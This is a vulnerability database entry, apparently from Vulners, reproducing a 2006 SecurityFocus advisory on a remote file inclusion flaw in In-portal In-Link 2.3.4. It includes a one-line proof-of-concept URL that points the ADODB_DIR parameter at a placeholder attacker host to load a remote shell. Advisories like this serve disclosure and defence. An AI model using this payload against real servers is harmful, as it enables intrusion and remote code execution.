Lucene search

K

In-portal In-Link 2.3.4 - ADODB_DIR.php Remote File Inclusion

๐Ÿ—“๏ธย 04 Sep 2006ย 00:00:00Reported byย Saudi HackrzTypeย 
exploitpack
ย exploitpack
๐Ÿ‘ย 11ย Views

In-portal In-Link 2.3.4 - ADODB_DIR.php Remote File Inclusion vulnerabilit

Show more
Code
source: https://www.securityfocus.com/bid/19824/info

In-portal In-link is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

In-link 2.3.4 and earlier versions are affected by this issue.

http://example.com/[path]/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=http://SHELLURL.COM?

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo